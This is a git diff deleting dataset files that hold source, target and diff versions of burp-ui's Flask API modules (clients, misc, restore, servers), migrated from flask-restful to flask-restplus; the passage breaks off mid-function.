in - api.bui.acl.servers(current_user.get_id()))): - raise BUIserverException('Sorry, you don\'t have rights on this server') - clients = api.bui.cli.get_all_clients(agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - # Filter only allowed clients - allowed = [] - check = False - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - check = True - allowed = api.bui.acl.clients(current_user.get_id(), server) - aclients = [] - for c in clients: - if check and c['name'] not in allowed: - continue - aclients.append(c) - j = api.bui.cli.get_clients_report(aclients, server) - return jsonify(results=j) - - -@api.resource('/api/clients.json', - '/api//clients.json', - endpoint='api.clients_stats') -class ClientsStats(Resource): - """The :class:`burpui.api.clients.ClientsStats` resource allows you to - access general statistics about your clients. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "last": "2015-05-17 11:40:02", - "name": "client1", - "state": "idle" - }, - { - "last": "never", - "name": "client2", - "state": "idle" - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above - """ - - if not server: - server = self.parser.parse_args()['server'] - try: - if (not api.bui.standalone and - api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and - server not in - api.bui.acl.servers(current_user.get_id()))): - raise BUIserverException('Sorry, you don\'t have any rights on this server') - j = api.bui.cli.get_all_clients(agent=server) - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - j = [x for x in j if x['name'] in api.bui.acl.clients(current_user.get_id(), server)] - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.target.py deleted file mode 100644 index 9c6c66e..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$clients.py.target.py +++ /dev/null @@ -1,314 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.clients - :platform: Unix - :synopsis: Burp-UI clients api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restplus import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/running-clients.json', - '/api//running-clients.json', - '/api/running-clients.json/', - '/api//running-clients.json/', - endpoint='api.running_clients') -class RunningClients(Resource): - """The :class:`burpui.api.clients.RunningClients` resource allows you to - retrieve a list of clients that are currently running a backup. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, client=None, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param client: Ask a specific client in order to know if it is running a backup - :type client: str - - :returns: The *JSON* described above. - """ - if not server: - server = self.parser.parse_args()['server'] - if client: - if api.bui.acl: - if (not api.bui.acl.is_admin(current_user.get_id()) and not - api.bui.acl.is_client_allowed(current_user.get_id(), - client, - server)): - r = [] - return jsonify(results=r) - if api.bui.cli.is_backup_running(client, server): - r = [client] - return jsonify(results=r) - else: - r = [] - return jsonify(results=r) - - r = api.bui.cli.is_one_backup_running(server) - # Manage ACL - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - if isinstance(r, dict): - new = {} - for serv in api.bui.acl.servers(current_user.get_id()): - allowed = api.bui.acl.clients(current_user.get_id(), serv) - new[serv] = [x for x in r[serv] if x in allowed] - r = new - else: - allowed = api.bui.acl.clients(current_user.get_id(), server) - r = [x for x in r if x in allowed] - return jsonify(results=r) - - -@api.resource('/api/running.json', - '/api//running.json', - endpoint='api.running_backup') -class RunningBackup(Resource): - """The :class:`burpui.api.clients.RunningBackup` resource allows you to - access the status of the server in order to know if there is a running - backup currently. - - This resource is part of the :mod:`burpui.api.clients` module. - """ - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": false - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above. - """ - j = api.bui.cli.is_one_backup_running(server) - # Manage ACL - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - if isinstance(j, dict): - new = {} - for serv in api.bui.acl.servers(current_user.get_id()): - allowed = api.bui.acl.clients(current_user.get_id(), serv) - new[serv] = [x for x in j[serv] if x in allowed] - j = new - else: - allowed = api.bui.acl.clients(current_user.get_id(), server) - j = [x for x in j if x in allowed] - r = False - if isinstance(j, dict): - for (k, v) in iteritems(j): - if r: - break - r = r or (len(v) > 0) - else: - r = len(j) > 0 - return jsonify(results=r) - - -@api.resource('/api/clients-report.json', - '/api//clients-report.json', - endpoint='api.clients_report') -class ClientsReport(Resource): - """The :class:`burpui.api.clients.ClientsReport` resource allows you to - access general reports about your clients. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "backups": [ - { - "name": "client1", - "number": 15 - }, - { - "name": "client2", - "number": 1 - } - ], - "clients": [ - { - "name": "client1", - "stats": { - "total": 296377, - "totsize": 57055793698, - "windows": "false" - } - }, - { - "name": "client2", - "stats": { - "total": 3117, - "totsize": 5345361, - "windows": "true" - } - } - ] - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above - """ - - if not server: - server = self.parser.parse_args()['server'] - j = [] - try: - # Manage ACL - if (not api.bui.standalone and api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and - server not in - api.bui.acl.servers(current_user.get_id()))): - raise BUIserverException('Sorry, you don\'t have rights on this server') - clients = api.bui.cli.get_all_clients(agent=server) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - # Filter only allowed clients - allowed = [] - check = False - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - check = True - allowed = api.bui.acl.clients(current_user.get_id(), server) - aclients = [] - for c in clients: - if check and c['name'] not in allowed: - continue - aclients.append(c) - j = api.bui.cli.get_clients_report(aclients, server) - return jsonify(results=j) - - -@api.resource('/api/clients.json', - '/api//clients.json', - endpoint='api.clients_stats') -class ClientsStats(Resource): - """The :class:`burpui.api.clients.ClientsStats` resource allows you to - access general statistics about your clients. - - This resource is part of the :mod:`burpui.api.clients` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """**GET** method provided by the webservice. - - The *JSON* returned is: - :: - - { - "results": [ - { - "last": "2015-05-17 11:40:02", - "name": "client1", - "state": "idle" - }, - { - "last": "never", - "name": "client2", - "state": "idle" - } - ] - } - - - The output is filtered by the :mod:`burpui.misc.acl` module so that you - only see stats about the clients you are authorized to. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :returns: The *JSON* described above - """ - - if not server: - server = self.parser.parse_args()['server'] - try: - if (not api.bui.standalone and - api.bui.acl and - (not api.bui.acl.is_admin(current_user.get_id()) and - server not in - api.bui.acl.servers(current_user.get_id()))): - raise BUIserverException('Sorry, you don\'t have any rights on this server') - j = api.bui.cli.get_all_clients(agent=server) - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - j = [x for x in j if x['name'] in api.bui.acl.clients(current_user.get_id(), server)] - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=j) diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.diff deleted file mode 100644 index 298cca9..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/misc.py b/burpui/api/misc.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/misc.py - +++ b/burpui/api/misc.py -@@ -12,7 +12,7 @@ from . import api - from ..misc.utils import BUIserverException - - from future.utils import iteritems --from flask.ext.restful import reqparse, Resource, abort -+from flask.ext.restplus import reqparse, Resource, abort - from flask.ext.login import current_user, login_required - from flask import render_template, make_response - diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.source.py deleted file mode 100644 index 39efe14..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.source.py +++ /dev/null @@ -1,84 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.misc - :platform: Unix - :synopsis: Burp-UI misc api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restful import reqparse, Resource, abort -from flask.ext.login import current_user, login_required -from flask import render_template, make_response - -import time - - -@api.resource('/api/render-live-template', - '/api//render-live-template', - '/api/render-live-template/', - '/api//render-live-template/', - endpoint='api.render_live_tpl') -class RenderLiveTpl(Resource): - """The :class:`burpui.api.misc.RenderLiveTpl` resource allows you to - render the *live view* template of a given client. - - This resource is part of the :mod:`burpui.api.api` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - A mandatory ``GET`` parameter called ``name`` is used to know what client we - are working on. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - self.parser.add_argument('name', type=str) - - @login_required - def get(self, server=None, name=None): - """API: render_live_tpl - :param name: the client name if any. You can also use the GET parameter - 'name' to achieve the same thing - :returns: HTML that should be included directly into the page - """ - if not server: - server = self.parser.parse_args()['server'] - if not name: - name = self.parser.parse_args()['name'] - # Check params - if not name: - abort(400, message='No client name provided') - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), name, server) or - not api.bui.acl.is_admin(current_user.get_id()))): - abort(403) - # refresh cache if 30 seconds elapsed since last refresh - if not api.bui.cli.refresh or (time.time() - api.bui.cli.refresh > 30): - api.bui.cli.is_one_backup_running() - if isinstance(api.bui.cli.running, dict): - if server and name not in api.bui.cli.running[server]: - abort(404) - else: - found = False - for (k, a) in iteritems(api.bui.cli.running): - found = found or (name in a) - if not found: - abort(404) - else: - if name not in api.bui.cli.running: - abort(404) - try: - counters = api.bui.cli.get_counters(name, agent=server) - except BUIserverException: - counters = [] - response = make_response(render_template('live-monitor-template.html', cname=name, counters=counters, server=server)) - response.headers['content-type'] = 'text/html' - return response diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.target.py deleted file mode 100644 index 99d1290..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$misc.py.target.py +++ /dev/null @@ -1,84 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.misc - :platform: Unix - :synopsis: Burp-UI misc api module. - -.. moduleauthor:: Ziirish - -""" -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restplus import reqparse, Resource, abort -from flask.ext.login import current_user, login_required -from flask import render_template, make_response - -import time - - -@api.resource('/api/render-live-template', - '/api//render-live-template', - '/api/render-live-template/', - '/api//render-live-template/', - endpoint='api.render_live_tpl') -class RenderLiveTpl(Resource): - """The :class:`burpui.api.misc.RenderLiveTpl` resource allows you to - render the *live view* template of a given client. - - This resource is part of the :mod:`burpui.api.api` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - A mandatory ``GET`` parameter called ``name`` is used to know what client we - are working on. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - self.parser.add_argument('name', type=str) - - @login_required - def get(self, server=None, name=None): - """API: render_live_tpl - :param name: the client name if any. You can also use the GET parameter - 'name' to achieve the same thing - :returns: HTML that should be included directly into the page - """ - if not server: - server = self.parser.parse_args()['server'] - if not name: - name = self.parser.parse_args()['name'] - # Check params - if not name: - abort(400, message='No client name provided') - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), name, server) or - not api.bui.acl.is_admin(current_user.get_id()))): - abort(403) - # refresh cache if 30 seconds elapsed since last refresh - if not api.bui.cli.refresh or (time.time() - api.bui.cli.refresh > 30): - api.bui.cli.is_one_backup_running() - if isinstance(api.bui.cli.running, dict): - if server and name not in api.bui.cli.running[server]: - abort(404) - else: - found = False - for (k, a) in iteritems(api.bui.cli.running): - found = found or (name in a) - if not found: - abort(404) - else: - if name not in api.bui.cli.running: - abort(404) - try: - counters = api.bui.cli.get_counters(name, agent=server) - except BUIserverException: - counters = [] - response = make_response(render_template('live-monitor-template.html', cname=name, counters=counters, server=server)) - response.headers['content-type'] = 'text/html' - return response diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.diff deleted file mode 100644 index 80bb322..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/restore.py b/burpui/api/restore.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/restore.py - +++ b/burpui/api/restore.py -@@ -15,7 +15,7 @@ from time import gmtime, strftime, time - # This is a submodule we can also use "from ..api import api" - from . import api - from ..misc.utils import BUIserverException --from flask.ext.restful import reqparse, Resource, abort -+from flask.ext.restplus import reqparse, Resource, abort - from flask.ext.login import current_user, login_required - from flask import Response, send_file, make_response, after_this_request - from werkzeug.datastructures import Headers diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.source.py deleted file mode 100644 index d925e64..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.source.py +++ /dev/null @@ -1,255 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.restore - :platform: Unix - :synopsis: Burp-UI restore api module. - -.. moduleauthor:: Ziirish - -""" -import select - -from zlib import adler32 -from time import gmtime, strftime, time - -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException -from flask.ext.restful import reqparse, Resource, abort -from flask.ext.login import current_user, login_required -from flask import Response, send_file, make_response, after_this_request -from werkzeug.datastructures import Headers -from werkzeug.exceptions import HTTPException - - -@api.resource('/api/restore//', - '/api//restore//', - endpoint='api.restore') -class Restore(Resource): - """The :class:`burpui.api.restore.Restore` resource allows you to - perform a file restoration. - - This resource is part of the :mod:`burpui.api.restore` module. - - The following parameters are supported: - - ``list``: list of files/directories to restore - - ``strip``: number of elements to strip in the path - - ``format``: returning archive format - - ``pass``: password to use for encrypted backups - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('list', type=str) - self.parser.add_argument('strip', type=str) - self.parser.add_argument('format', type=str) - self.parser.add_argument('pass', type=str) - - @login_required - def post(self, server=None, name=None, backup=None): - """**POST** method provided by the webservice. - This method returns a :mod:`flask.Response` object. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: A :mod:`flask.Response` object representing an archive of the restored files - """ - args = self.parser.parse_args() - l = args['list'] - s = args['strip'] - f = args['format'] - p = args['pass'] - resp = None - if not f: - f = 'zip' - # Check params - if not l or not name or not backup: - abort(400, message='missing arguments') - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server) and not - api.bui.acl.is_admin(current_user.get_id()))): - abort(403) - if server: - filename = 'restoration_%d_%s_on_%s_at_%s.%s' % ( - backup, - name, - server, - strftime("%Y-%m-%d_%H_%M_%S", gmtime()), - f) - else: - filename = 'restoration_%d_%s_at_%s.%s' % ( - backup, - name, - strftime("%Y-%m-%d_%H_%M_%S", gmtime()), - f) - if not server: - # Standalone mode, we can just return the file unless there were errors - archive, err = api.bui.cli.restore_files(name, backup, l, s, f, p) - if not archive: - if err: - return make_response(err, 500) - abort(500) - try: - # Trick to delete the file while sending it to the client. - # First, we open the file in reading mode so that a file handler - # is open on the file. Then we delete it as soon as the request - # ended. Because the fh is open, the file will be actually removed - # when the transfert is done and the send_file method has closed - # the fh. - fh = open(archive, 'r') - - @after_this_request - def remove_file(response): - """Callback function to run after the client has handled - the request to remove temporary files. - """ - import os - os.remove(archive) - return response - resp = send_file(fh, - as_attachment=True, - attachment_filename=filename, - mimetype='application/zip') - resp.set_cookie('fileDownload', 'true') - except Exception as e: - api.bui.cli._logger('error', str(e)) - abort(500) - else: - # Multi-agent mode - socket = None - try: - socket, length, err = api.bui.cli.restore_files(name, - backup, - l, - s, - f, - p, - server) - api.bui.cli._logger('debug', 'Need to get {} Bytes : {}'.format(length, socket)) - - if err: - api.bui.cli._logger('debug', 'Something went wrong: {}'.format(err)) - socket.close() - return make_response(err, 500) - - def stream_file(sock, l): - """The restoration took place on another server so we need - to stream the file that is not present on the current - machine. - """ - bsize = 1024 - received = 0 - if l < bsize: - bsize = l - while received < l: - buf = b'' - r, _, _ = select.select([sock], [], [], 5) - if not r: - raise Exception('Socket timed-out') - buf += sock.recv(bsize) - if not buf: - continue - received += len(buf) - api.bui.cli._logger('debug', '{}/{}'.format(received, l)) - yield buf - sock.close() - - headers = Headers() - headers.add('Content-Disposition', - 'attachment', - filename=filename) - headers['Content-Length'] = length - - resp = Response(stream_file(socket, length), - mimetype='application/zip', - headers=headers, - direct_passthrough=True) - resp.set_cookie('fileDownload', 'true') - resp.set_etag('flask-%s-%s-%s' % ( - time(), - length, - adler32(filename.encode('utf-8')) & 0xffffffff)) - except HTTPException as e: - raise e - except Exception as e: - api.bui.cli._logger('error', str(e)) - abort(500) - return resp - - -@api.resource('/api/schedule-restore//', - '/api//schedule-restore//', - endpoint='api.schedule_restore') -class ScheduleRestore(Resource): - """The :class:`burpui.api.restore.ScheduleRestore` resource allows you to - prepare a file restoration. - - This resource is part of the :mod:`burpui.api.restore` module. - - The following parameters are supported: - - ``list``: list of files/directories to restore - - ``strip``: number of elements to strip in the path - - ``prefix``: prefix to the restore path - - ``force``: whether to overwrite existing files - - ``restore_to``: restore files on an other client - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('list-sc', type=str) - self.parser.add_argument('strip-sc', type=str) - self.parser.add_argument('prefix-sc', type=str) - self.parser.add_argument('force-sc', type=str) - self.parser.add_argument('restoreto-sc', type=str) - - @login_required - def put(self, server=None, name=None, backup=None): - """**PUT** method provided by the webservice. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: Status message (success or failure) - """ - args = self.parser.parse_args() - l = args['list-sc'] - s = args['strip-sc'] - p = args['prefix-sc'] - f = args['force-sc'] - to = args['restoreto-sc'] - j = [] - err = [] - # Check params - if not l or not name or not backup: - err.append([2, 'Missing options']) - return {'notif': err}, 400 - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server) and not - api.bui.acl.is_admin(current_user.get_id()))): - err.append([2, 'You are not allowed to perform a restoration for this client']) - return {'notif': err}, 403 - try: - j = api.bui.cli.schedule_restore(name, backup, l, s, f, p, to, server) - return {'notif': j}, 200 - except BUIserverException as e: - err.append([2, str(e)]) - return {'notif': err}, 500 diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.target.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.target.py deleted file mode 100644 index 07a1b83..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$restore.py.target.py +++ /dev/null @@ -1,255 +0,0 @@ -# -*- coding: utf8 -*- -""" -.. module:: burpui.api.restore - :platform: Unix - :synopsis: Burp-UI restore api module. - -.. moduleauthor:: Ziirish - -""" -import select - -from zlib import adler32 -from time import gmtime, strftime, time - -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException -from flask.ext.restplus import reqparse, Resource, abort -from flask.ext.login import current_user, login_required -from flask import Response, send_file, make_response, after_this_request -from werkzeug.datastructures import Headers -from werkzeug.exceptions import HTTPException - - -@api.resource('/api/restore//', - '/api//restore//', - endpoint='api.restore') -class Restore(Resource): - """The :class:`burpui.api.restore.Restore` resource allows you to - perform a file restoration. - - This resource is part of the :mod:`burpui.api.restore` module. - - The following parameters are supported: - - ``list``: list of files/directories to restore - - ``strip``: number of elements to strip in the path - - ``format``: returning archive format - - ``pass``: password to use for encrypted backups - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('list', type=str) - self.parser.add_argument('strip', type=str) - self.parser.add_argument('format', type=str) - self.parser.add_argument('pass', type=str) - - @login_required - def post(self, server=None, name=None, backup=None): - """**POST** method provided by the webservice. - This method returns a :mod:`flask.Response` object. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: A :mod:`flask.Response` object representing an archive of the restored files - """ - args = self.parser.parse_args() - l = args['list'] - s = args['strip'] - f = args['format'] - p = args['pass'] - resp = None - if not f: - f = 'zip' - # Check params - if not l or not name or not backup: - abort(400, message='missing arguments') - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server) and not - api.bui.acl.is_admin(current_user.get_id()))): - abort(403) - if server: - filename = 'restoration_%d_%s_on_%s_at_%s.%s' % ( - backup, - name, - server, - strftime("%Y-%m-%d_%H_%M_%S", gmtime()), - f) - else: - filename = 'restoration_%d_%s_at_%s.%s' % ( - backup, - name, - strftime("%Y-%m-%d_%H_%M_%S", gmtime()), - f) - if not server: - # Standalone mode, we can just return the file unless there were errors - archive, err = api.bui.cli.restore_files(name, backup, l, s, f, p) - if not archive: - if err: - return make_response(err, 500) - abort(500) - try: - # Trick to delete the file while sending it to the client. - # First, we open the file in reading mode so that a file handler - # is open on the file. Then we delete it as soon as the request - # ended. Because the fh is open, the file will be actually removed - # when the transfert is done and the send_file method has closed - # the fh. - fh = open(archive, 'r') - - @after_this_request - def remove_file(response): - """Callback function to run after the client has handled - the request to remove temporary files. - """ - import os - os.remove(archive) - return response - resp = send_file(fh, - as_attachment=True, - attachment_filename=filename, - mimetype='application/zip') - resp.set_cookie('fileDownload', 'true') - except Exception as e: - api.bui.cli._logger('error', str(e)) - abort(500) - else: - # Multi-agent mode - socket = None - try: - socket, length, err = api.bui.cli.restore_files(name, - backup, - l, - s, - f, - p, - server) - api.bui.cli._logger('debug', 'Need to get {} Bytes : {}'.format(length, socket)) - - if err: - api.bui.cli._logger('debug', 'Something went wrong: {}'.format(err)) - socket.close() - return make_response(err, 500) - - def stream_file(sock, l): - """The restoration took place on another server so we need - to stream the file that is not present on the current - machine. - """ - bsize = 1024 - received = 0 - if l < bsize: - bsize = l - while received < l: - buf = b'' - r, _, _ = select.select([sock], [], [], 5) - if not r: - raise Exception('Socket timed-out') - buf += sock.recv(bsize) - if not buf: - continue - received += len(buf) - api.bui.cli._logger('debug', '{}/{}'.format(received, l)) - yield buf - sock.close() - - headers = Headers() - headers.add('Content-Disposition', - 'attachment', - filename=filename) - headers['Content-Length'] = length - - resp = Response(stream_file(socket, length), - mimetype='application/zip', - headers=headers, - direct_passthrough=True) - resp.set_cookie('fileDownload', 'true') - resp.set_etag('flask-%s-%s-%s' % ( - time(), - length, - adler32(filename.encode('utf-8')) & 0xffffffff)) - except HTTPException as e: - raise e - except Exception as e: - api.bui.cli._logger('error', str(e)) - abort(500) - return resp - - -@api.resource('/api/schedule-restore//', - '/api//schedule-restore//', - endpoint='api.schedule_restore') -class ScheduleRestore(Resource): - """The :class:`burpui.api.restore.ScheduleRestore` resource allows you to - prepare a file restoration. - - This resource is part of the :mod:`burpui.api.restore` module. - - The following parameters are supported: - - ``list``: list of files/directories to restore - - ``strip``: number of elements to strip in the path - - ``prefix``: prefix to the restore path - - ``force``: whether to overwrite existing files - - ``restore_to``: restore files on an other client - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('list-sc', type=str) - self.parser.add_argument('strip-sc', type=str) - self.parser.add_argument('prefix-sc', type=str) - self.parser.add_argument('force-sc', type=str) - self.parser.add_argument('restoreto-sc', type=str) - - @login_required - def put(self, server=None, name=None, backup=None): - """**PUT** method provided by the webservice. - - :param server: Which server to collect data from when in multi-agent mode - :type server: str - - :param name: The client we are working on - :type name: str - - :param backup: The backup we are working on - :type backup: int - - :returns: Status message (success or failure) - """ - args = self.parser.parse_args() - l = args['list-sc'] - s = args['strip-sc'] - p = args['prefix-sc'] - f = args['force-sc'] - to = args['restoreto-sc'] - j = [] - err = [] - # Check params - if not l or not name or not backup: - err.append([2, 'Missing options']) - return {'notif': err}, 400 - # Manage ACL - if (api.bui.acl and - (not api.bui.acl.is_client_allowed(current_user.get_id(), - name, - server) and not - api.bui.acl.is_admin(current_user.get_id()))): - err.append([2, 'You are not allowed to perform a restoration for this client']) - return {'notif': err}, 403 - try: - j = api.bui.cli.schedule_restore(name, backup, l, s, f, p, to, server) - return {'notif': j}, 200 - except BUIserverException as e: - err.append([2, str(e)]) - return {'notif': err}, 500 diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.diff b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.diff deleted file mode 100644 index 44b227d..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/burpui/api/servers.py b/burpui/api/servers.py - index 66f580a4db8b186e9e8658c6ed487fa89cc4a4ec..8ef3b624e52ac6a9420c533b0dd744a36d91c4d3 100644 - --- a/burpui/api/servers.py - +++ b/burpui/api/servers.py -@@ -5,7 +5,7 @@ from . import api - from ..misc.utils import BUIserverException - - from future.utils import iteritems --from flask.ext.restful import reqparse, Resource -+from flask.ext.restplus import reqparse, Resource - from flask.ext.login import current_user, login_required - from flask import jsonify - diff --git a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.source.py b/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.source.py deleted file mode 100644 index ae9fb7a..0000000 --- a/v1/data/codefile/ziirish@burp-ui__8ef3b62__burpui$api$servers.py.source.py +++ /dev/null @@ -1,97 +0,0 @@ -# -*- coding: utf8 -*- - -# This is a submodule we can also use "from ..api import api" -from . import api -from ..misc.utils import BUIserverException - -from future.utils import iteritems -from flask.ext.restful import reqparse, Resource -from flask.ext.login import current_user, login_required -from flask import jsonify - - -@api.resource('/api/servers.json', endpoint='api.servers_stats') -class ServersStats(Resource): - """The :class:`burpui.api.servers.ServersStats` resource allows you to - retrieve statistics about servers/agents. - - This resource is part of the :mod:`burpui.api.servers` module. - """ - - @login_required - def get(self): - r = [] - if hasattr(api.bui.cli, 'servers'): # pragma: no cover - check = False - allowed = [] - if (api.bui.acl and not - api.bui.acl.is_admin(current_user.get_id())): - check = True - allowed = api.bui.acl.servers(current_user.get_id()) - for serv in api.bui.cli.servers: - try: - if check: - if serv in allowed: - r.append({'name': serv, - 'clients': len(api.bui.cli.servers[serv].get_all_clients(serv)), - 'alive': api.bui.cli.servers[serv].ping()}) - else: - r.append({'name': serv, - 'clients': len(api.bui.cli.servers[serv].get_all_clients(serv)), - 'alive': api.bui.cli.servers[serv].ping()}) - except BUIserverException as e: - err = [[2, str(e)]] - return jsonify(notif=err) - return jsonify(results=r) - - -@api.resource('/api/live.json', - '/api//live.json', - endpoint='api.live') -class Live(Resource): - """The :class:`burpui.api.servers.Live` resource allows you to - retrieve a list of servers that are currently *alive*. - - This resource is part of the :mod:`burpui.api.servers` module. - - An optional ``GET`` parameter called ``server`` is supported when running - in multi-agent mode. - """ - - def __init__(self): - self.parser = reqparse.RequestParser() - self.parser.add_argument('server', type=str) - - @login_required - def get(self, server=None): - """API: live - :returns: the live status of the server - """ - if not server: - server = self.parser.parse_args()['server'] - r = [] - if server: - l = (api.bui.cli.is_one_backup_running(server))[server] - else: - l = api.bui.cli.is_one_backup_running() - if isinstance(l, dict): # pragma: no cover - for (k, a) in iteritems(l): - for c in a: - s = {} - s['client'] = c - 